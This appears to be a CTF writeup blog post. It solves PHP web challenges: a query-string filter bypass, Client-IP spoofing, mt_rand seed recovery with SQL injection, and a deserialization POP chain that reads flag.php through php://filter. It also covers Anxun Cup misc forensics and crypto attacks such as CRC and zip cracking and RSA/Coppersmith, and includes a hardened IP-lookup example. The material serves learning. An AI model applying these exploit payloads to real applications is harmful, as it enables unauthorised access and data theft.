$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

The hint says the flag is in secrettw.php. Viewing the source shows JavaScript; running it in the console says to send Merak (seeing the IP on the page I thought XFF would have to be changed, but passing a parameter was enough).

Pass the parameter 127.0.0.1 to get the source:

# Layer 2
# payload: http://e89f0e7e-b386-4abc-b337-95227c876cf3.merak-ctf.site/secrettw.php?2333=%64%61%74%61%3a%2c%74%6f%64%61%74%20%69%73%20%61%20%68%61%70%70%79%20%64%61%79&file=ZmpdYSZmXGI=
<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 	# restrict file access to the current directory
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?> 

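There is a small reversing step here:

<?php
# ord: converts the first byte of a string to a value between 0 and 255
# chr: returns the character for the given value
# The two are inverses of each other, so the whole thing means:
# $_GET['file'] has to end up as flag.php
# 1. base64-decode
# 2. add 0, 2, 4, 6, 8, ... to the ord of each byte in turn and return the result
# Changing it slightly gives a PHP script that does the job
$v="flag.php";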
function change($v){
    $re = '';
    for($i=0;$i<strlen($v);$i++){
//        $re .= chr ( ord ($v[$i]) + $i*2 );
        $re .= chr ( ord ($v[$i]) - $i*2 );
    }
    return $re;
}
echo base64_encode(change($v));


Changing XFF does not work for this challenge; Client-IP has to be changed instead. The source shows why:

#takeip.php
<?php
function getIp()
{
    if ($_SERVER["HTTP_CLIENT_IP"] && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    } else {
        if ($_SERVER["HTTP_X_FORWARDED_FOR"] && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) {
            return  "sorry,this way is banned!";
        } else {
            if ($_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
                $ip = $_SERVER["REMOTE_ADDR"];
            } else {
                if (isset ($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],
                        "unknown")
                ) {
                    $ip = $_SERVER['REMOTE_ADDR'];
                } else {
                    $ip = "unknown";
                }
            }
        }
    }
    return ($ip);
}
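
getIp() above returns the Client-IP request header whenever it is present, so the "local access only" gate rests on a value the client chooses. The comparison below is an added example, not code from the challenge: get_ip_as_in_challenge ports that logic to Python, get_ip_hardened is one common mitigation (use the socket peer, and read X-Forwarded-For only when the peer is a known proxy), and the proxy range and request values are constructed.

```python
# Added example (not from the original post). TRUSTED_PROXIES and the sample
# addresses are constructed; adjust the range to the real deployment.
import ipaddress


def get_ip_as_in_challenge(headers, remote_addr):
    """Port of takeip.php: a client-supplied Client-IP header wins outright."""
    client_ip = headers.get("Client-IP", "")
    if client_ip and client_ip.lower() != "unknown":
        return client_ip
    forwarded = headers.get("X-Forwarded-For", "")
    if forwarded and forwarded.lower() != "unknown":
        return "sorry,this way is banned!"
    if remote_addr and remote_addr.lower() != "unknown":
        return remote_addr
    return "unknown"


TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # hypothetical value


def _is_trusted(addr, trusted):
    return any(addr in net for net in trusted)


def get_ip_hardened(headers, remote_addr, trusted=TRUSTED_PROXIES):
    """Return the socket peer unless it is a trusted proxy.

    Behind a trusted proxy, walk X-Forwarded-For from the right and return
    the first hop that is not itself a trusted proxy; entries further left
    are client-controlled and are ignored. Client-IP is never consulted.
    """
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted(peer, trusted):
        return str(peer)
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                      # malformed entry: stop trusting the chain
        if not _is_trusted(addr, trusted):
            return str(addr)
    return str(peer)


if __name__ == "__main__":
    spoofed = {"Client-IP": "127.0.0.1"}           # constructed request
    print(get_ip_as_in_challenge(spoofed, "203.0.113.7"))
    print(get_ip_hardened(spoofed, "203.0.113.7"))
```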

Ezaudit

We land on a very proper-looking website; none of the links work, it is just an empty site.

Scanning the site turns up a reassuring line of green.

# The archive contains only login.php
<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // If empty, treat the field as not filled in: show an error and return to the login page after 3 seconds
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

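A quick analysis: you have to find the private key from the public key and then reach the database query; the password field has a simple SQL injection.

These are pseudo-random numbers from mt_srand() and mt_rand(); brute-force the seed with the php_mt_seed tool.

Seed 1775196155 generates the private key XuNhoueCDCGc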

Ezpop

Going in, the page is just the source code, with a hint that the flag is in flag.php.

It tells you to study deserialization magic methods; it is simply a deserialization challenge.

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

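Approach: use Show to get Modifier to include flag.php. Unserializing a Show runs __wakeup, whose preg_match treats $this->source as a string; if source is itself a Show, that calls __toString, which reads $this->str->source; with str set to a Test, that triggers __get, which calls $this->p as a function, and a Modifier there runs __invoke and includes $var.
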
<?php
class Modifier{
    protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source=$file;
    }
}
class Test{
    public $p;
    public function __construct($p)
    {
        $this->p=$p;
    }
}
$show1 = new Show('add');
$show2 = new Show($show1);
$m = new Modifier();
$test= new Test($m);
$show1->str=$test;
echo urlencode(serialize($show2));

Base64-decode the output and you have the source of flag.php.

Ezpop_Revenge

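2020 安洵杯 (Anxun Cup) Misc&Crypto writeup

Overall the challenges felt short on substance, all test points that have been done to death, but I'll pad out a blog post with them anyway.

Misc

Sign-in

A QR code; scanning it leads to following an official account. Replying flag returns a fake flag; following the hint, replying fl4g returns a net-disk link. Inside is a Word document full of emoji. It is not emojicode; base100 decoding gives the flag.

王牌特工 (Ace Agent)

Disk forensics. There is a file named findme, which is ext3; mounting it gives a flagbox and a key.txt with the following hint:
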
key:a_cool_key
use Veracrypt

Mounting flagbox with VeraCrypt shows a fake flag file that hints to look back.

extundelete findme --restore-all

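Recovering the deleted files in findme yields .coolboy.swp, a vim swap file, which contains a base64 string: 55yf55qE5a+G56CBOnRoaXNfaXNfYV90cnVlX2tleQ==. The real password is this_is_a_true_key; mounting with it gives the flag.

套娃 (Matryoshka)

A zip challenge. The first layer is solved by CRC brute forcing, which gives the password !qQIdEa@#!z)
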
0xea4446b6
0xed7987de
0x46fe0943
0x4be30989
0xb31975c0
0xd6bb1bef
# from network
import binascii
import string

def crack_crc():
    crc_list = [0xea4446b6,0xed7987de,0x46fe0943,0x4be30989,0xb31975c0,0xd6bb1bef]
    chars = string.printable
    for res_crc in crc_list:
        for str_1 in chars:
            for str_2 in chars:
                comment = str_1 + str_2
                test_crc = binascii.crc32(comment.encode())
                calc_crc = test_crc & 0xffffffff
                if calc_crc == res_crc:
                    print(comment)

if __name__ == '__main__':
    crack_crc()

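The second layer is a known-plaintext attack. I hit a snag while doing it: the password came out as %3#c$v!@ but decrypting the file failed. I found the cause: once the pseudo-encryption is removed it decrypts normally, or flag.txt can be dragged out on its own and decrypted.

This gives the string fgic__notl{prwc__}az&ceadi@; an online rail-fence decoder gives flag{zip&crc_we_can_do_it}@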

BeCare4

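Took first blood. I did not expect this challenge to still be worth 450+ points at the end.

A text file. I wanted to look up the article's source on Baidu, and on pasting it noticed zero-width characters, which give the archive password: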

oh,you found the pass:RealV1siBle

Extracting gives an image; SilentEye gives the flag directly.

Crypto

密码学?爆破就行了 (Cryptography? Just brute-force it)

The crypto sign-in challenge; it is plain brute force. I left it running on a server for a while.

import hashlib
from string import ascii_lowercase,digits
table = ascii_lowercase+digits
ciphier = '0596d989a2938e16bcc5d6f89ce709ad9f64d36316ab80408cb6b89b3d7f064a'
for a in table:
    for b in table:
        for c in table:
            for d in table:
                for e in table:
                    for f in table:
                        flag = 'd0g3{71b2b5616'+a+b+'2a4639'+c+d+'7d979'+e+f+'de964c}'
                        tmp = hashlib.sha256(flag.encode()).hexdigest()
                        if tmp == ciphier:
                            print(flag)
                            exit()
d0g3{71b2b5616ee2a4639a07d979ebde964c}

easyaes

from Crypto.Util.number import *
from Crypto.Cipher import AES
msg = b'Welcome to this competition, I hope you can have fun today!!!!!!'
hint_key = 56631233292325412205528754798133970783633216936302049893130220461139160682777
last32 = '3c976c92aff4095a23e885b195077b66'
# print(hex(hint_key))
# 0x7d3424647d3424647d3424647d34246419044357064341081e5b4901045b5119L
hint = hex(hint_key)[2:10]*8
key = hint_key^int(hint, 16)
key = long_to_bytes(key)
print(b"key:"+key)
# d0g3{welcomeyou}

aes=AES.new(key,AES.MODE_ECB)

tmp = long_to_bytes(0x3c976c92aff4095a23e885b195077b66)
for i in range(4, 0, -1):
    tmp = aes.decrypt(tmp)
    tmp = long_to_bytes(bytes_to_long(tmp) ^ bytes_to_long(msg[16*(i-1):16*i]))
print(tmp)

easyrsa

challenge1: Fermat's little theorem; take the square root to get m, which is p
challenge2: sign-in level, with a hint: Flag is a 764-length number that starts with "(too long, so I won't paste it; go run it yourself)", and CYZ says he can solve the problem if he was given two more numbers
challenge3: the high bits of the flag are given and e is small, so solve it with a Coppersmith attack
The online Sage run seemed to have a small problem: solving for x was fine, but the final computation failed for a reason I don't know. Pasting x back in myself and calling long_to_bytes was enough:

ohhhhhhhhhhhhhhhhhhhhhhhh!You are good at math and crypto ,I hope you have fun today.We should think of not only the small plaintext attack, but also the coppersmith attack when e is smallWHAT?You say you only wanna flag and don' want to talk with me .OK,fine! The flag is : d0g3{e173c0f114c59c2bdea69c67422be407}

from Crypto.Util.number import *
from gmpy2 import *
# --------------challenge 1-------------
n = 10050095014547257781432719892909820612730955980465259676378711053379530637537082959157449310691856567584792956476780977871348290765339769265796235196183464082153542864869953748019765139619014752579378866972354738500054872580260903258315293588496063613299656519940131695232458799137629873477475091085854962677524091351680654318535417344913749322340318860437103597983101958967342493037991934758199221146242955689392875557192192462927253635018175615991531184323989958707271442555251694945958064367263082416655380103916187441214474502905504694440020491633862067243768930954759333735863069851757070183172950390134463839187
c = 522627051172673216607019738378749874116772877858344748349627321977492158105699887369893079581450048789131578556338186004983533975454988450450635141267157135506032849129152411194539350100279698888357898902460651973610161382266600081865609650174137113252711515464274593530115825189780860732147803369868525723790644619452538755225868382505974710418995847979384726953915873857530098330095151094837190566851416540540805185485212577333604309698822785682707412587829684108913753204398552196441996201678339688766979634246337855516220753995430266970473808724410357458278585135750810810484678948146374963838334596646926215341
hint1 = 134805774328615624446574490322803283547316698647214138487576352482438867186094276263735342558169004773286779632939369099910639984165263724781958841009573156241531958373198729926012152201548649349842790727259831232277600944618096069835436884888782994513452252257103877595707828731260669076400456300668581565291455061609385003064649522735776446930209884653223939689686840631001863143579575759834304817613040932998629846110770749941179601474484275548912570668460216633586988225562794026430881265344731575650165992321629617982004131413202026628777742093026476064486873565664625105013298396598413667761372217260994853420062861590358
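# hint1 = 2 * d + 246810 * e * phi
# e*d = 1 (mod phi) and m^phi = 1 (mod n), so c^hint1 = m^2 (mod n)
m = pow(c,hint1,n)
# Assumes m^2 < n; iroot returns (root, is_exact) and only the root is kept
m = iroot(m,2)[0]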
print('m',m)
# 234702123
# --------------challenge 2-------------
q = m
e = 0x10001
n = 133561991523711714238641512987809330530212246892569593026319411449791084194115873781301422593495806927875828290629679020098834182528012835469352471635087375406306534880352693134486855968468946334439553553593196889196239169351375517588892769598963002098115826389220099548938169095670740942251209102500450728442583559710183771974489284632651296188035458586935211952691589627681567274801028577256215269233875203212438263987034556969968774119389693056239796736659926866707857937025200924828822267781445721099763436020785585453958594470906716195030613615725126057391084801585533926767137218524047259398886392592317910204988634868663634415285507325190415658931169841182499733179254162060738994027842088553562013488445789594342451823783136881968032197575016845492231433684884872631894561254381663562267075103417879327236182565223877901300392217967589154857009356640377622996801781797109089687661697856930394706016954531077165127402008444818092498106642068414208190583373314287381712963712098566595399301400378116274132918572709221391531621228936206630829355801192700264684469488261781954165940553346889395507153750291402535330239420975542926664420153925171757944018621411265539452424569343708318070259746118326558005521868356304582694159507379335214599839668805877215983938986674084063185863612335339836810044252829401409522709997562887276661672718820881541500852400369184737236082178767653725044900394959369367604992512713490494168594433000695046297712977059205623777990102604073885527049867682390577577616773090662829024271568456346362315351643767420198116229892060385453123572533267805396437865025639093881944841521458804810097550625853182396288247815370818578103543117466070812804267915674186488979548392193291727228018246788487524292081389142018151246889408421936865224469589631518283230229213787648552632437566756058034131355439709320923876063030896228165897498746898125821639893238387694549304110003941329763552493326245073779912107372271854798616245416264801377068163622812994786201580895459712414134184992440395336131037558976058298521312536969408724436512019410835904564817724243688308776888170183074838453466914170790840559860531933430176605716828492670093771129301541861534595181565621644268739349035133062776852304594204220291667924128313579203359827093150911871520605180797438668872585571501531844999598674037998642821148417473110716470439750642781609483016636419373004760601783594025036152924259863627732874940148083408474700265895269165869619971810103499607445649821
p = 689159326758330864205993810270646658558112329195746149991184055909755461246626153920231796960903018393806410715812453949253930576368274228434916375544579284365205241766136566047482065208442992856658212126772417415403473480889927931481129434854332858754668120563818975006384512615022532233244596546830392476321031156328699572283946257730515089543367929326280871305776349305346159311591820455943842203357066465523558715870586535188343603460826231817622511283563179065036619023415848694281294463836320838105950552498785365535923041927491743402053568747113507098917091780797009380675587381805253390649630338055131031679595664055361678114747608302944715308343764678875659039394225950479683967885912291399162609094622980318391045105733088508798371414996479107970975717563552614856114065668728607215268431341079233630995168600896375314067716366181300081684353583326214062788182429536300917720999423489104723824360299238754986351169209709892739317096741609428484854087163771300777717883057028145424827875496235567904291417092378448353222179114362314382900648079547647848024440220204768433974038004942869937932015294078073975703156613070125753344841550872429670559866184492945262960524545894823245933714684747784492095876370443994948425495841
c = 65553658155452064459040687299632299415295760116470555100400688788937893101658136830409082198753928673469636810831761104117535054304536941814523449491308187105740319828511969750359402834799486354958723098881095067882833993358468923611118977258293638107874383059048015701807718209929028151240509801801995570592890519253676774278321334154528938199389248563657673061299152526380072934917964488153875744843855913524788571997024947738868563951687976817548296078497817264410193882661874749304071168979787307490320366615899942861059615405569154961435894469325778407081182151320629413711622905703628430999201763846682516985530373643176026602901129520439581385946775511292435206913016381293219606333035648747877313424616408338829137581998558399694071257787294948211441360283876078405831210625321012072477187438320944119825970347654743794743846351762763177440045084761025728597526592892602263484022280653040195670941221493307430623213388669939114424884078502946247136016528925968280034099568454876076717790529204207317485416329062672971939549478648687894958552760953682796211975576320713576155031581257782352223857605149825435939889497465805857339911597479498085071301601506276220487493620870555545057189236870008182212284992968466451864806648279032294546676543599599279519394341289357968292292966055189578253350591765186079486142930848439238134776982658066494378507873003509820326863340562093906137812952544399266821679905073464535234547335867090392493005792528534561846391285698943396889671437127470587837989050518266365099789392584686615435440486086402941357614369171354355307532351370775920044953381482310949663868493911752104873824099597326393857349237228788875273525189373323552519106738497767546337587947368062413334887230166285909705065920918078052826480092129173127887307158867274895914733110276134124505178182548094607594799978378381804502097507167978950926067243870989514735314054362049917668015341349933704885009878192354865067520219676784278082055728039064858769077997521541853184489175120623176481708269464933868222226748491078319156602229948646960513946846417957356535995079525993783278312017766715177078804065822913241465133977233398851120059496221650357891946344151601586169979516826622503491746992282716591488199657450776596383692706657692673860134555990821730412919497018889046615548520878486492644159735144935329502984929679831356967030870226422768447430410031028770529758721438528263719267616233686813781828066547393953352033364851486926368090757420184816634373721
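# r = n//q//p
# phi = (p-1)*(q-1)*(r-1)
# q is known from challenge 1, so divide it out and decrypt modulo p*r instead;
# this recovers the plaintext as long as it is smaller than p*r
n = n//q
r = n//p
phi = (p-1)*(r-1)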
d = invert(e,phi)
hint2 = pow(c,d,n)
# print(hint2)
print(long_to_bytes(hint2))
'''
Flag is a 764-length number that starts with "11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047",
and CYZ says he can solve the problem if he was given two more numbers
'''
# --------------challenge 3-------------
e = 5
n = 14857387925078594782296815160632343246361073432459148990826882280149636079353743233970188012712079179396872746334143946166398665205889211414809061990804629906990919975187761209638578624750977626427334126665295876888197889611807587476285991599511809796600855689969285611439780660503760599419522224129074956376232480894299044645423966132497814477710701209588359243945406653547034819927990978087967107865071898215805154003530311865483912924517801551052430227039259201082691698480830966567550828053196299423168934840697637891311424286534363837640448614727396254288829197614805073711893711252067987576745683317789020760081
c = 14035143725862612299576867857272911865951893239411969382153274945929406881665641140566462510177132511558933111728871930062074990934496715765999564244916409345156132996227113853067808126894818934327468582686975383715892108247084995817427624992232755966398834682079985297050358462588989699096264155802168300026093598601350106309023915300973067720164567785360383234519093637882582163398344514810028120555511836375795523327469278186235781844951253058134566846816114359878325011207064300185611905609820210904126312524631330083758585084521500322528017455972299008481301204209945411774541553636405290572228575790342839240414
'''
# sagemath
m_high = 11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047
R.<x> = PolynomialRing(Zmod(n))
f = (m_high * (10**54)+ x) ** 5 - c
solve = f.monic().small_roots(X=2 ^ 200, beta=1)
x = solve[0]
# The online Sage instance errors out at this point; just print x and paste it back
flag = (m_high * (10**54)+ x)
print(x)
'''
flag = 11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047675003330981130439478093707252121278358852500850751357
print(long_to_bytes(flag))
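The two identities the first two challenges rely on, shown as an added example that is not part of the original writeup: a leaked value of the form 2*d + k*e*phi behaves as a decryption exponent for m^2, and a three-prime modulus with one factor known can be decrypted modulo the product of the other two. The primes, messages and function names below are constructed for illustration and are not the challenge's values.

```python
# Added illustration with constructed toy primes; not the challenge's values.
from math import isqrt

E = 65537
P, Q, R = 1009, 1013, 1019          # constructed small primes


def square_from_hint(c, hint, n):
    """Given hint = 2*d + k*e*phi, return m when m*m < n.

    c^hint = m^(2*e*d) * m^(k*e*e*phi) = m^2 (mod n) by Euler's theorem,
    so the hint works as a decryption exponent for m^2.
    """
    sq = pow(c, hint, n)
    root = isqrt(sq)
    if root * root != sq:
        raise ValueError("m^2 wrapped modulo n; an integer root does not apply")
    return root


def decrypt_dropping_factor(c, e, n, p, q):
    """n = p*q*r with p and q known: decrypt modulo p*r (exact only if m < p*r)."""
    n_pr = n // q
    r = n_pr // p
    d = pow(e, -1, (p - 1) * (r - 1))   # modular inverse, Python 3.8+
    return pow(c % n_pr, d, n_pr)


def make_hint(p, q, e, k=246810):
    """Build a hint of the same shape as hint1 for a two-prime toy key."""
    phi = (p - 1) * (q - 1)
    return 2 * pow(e, -1, phi) + k * e * phi


if __name__ == "__main__":
    n1 = P * Q
    print(square_from_hint(pow(123, E, n1), make_hint(P, Q, E), n1))
    n2 = P * Q * R
    print(decrypt_dropping_factor(pow(424242, E, n2), E, n2, P, Q))
```

Both shortcuts depend on size bounds: the square root is exact only while m^2 < n, and decrypting modulo p*r returns the plaintext reduced modulo p*r.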
WRITTEN BY
ruokeqx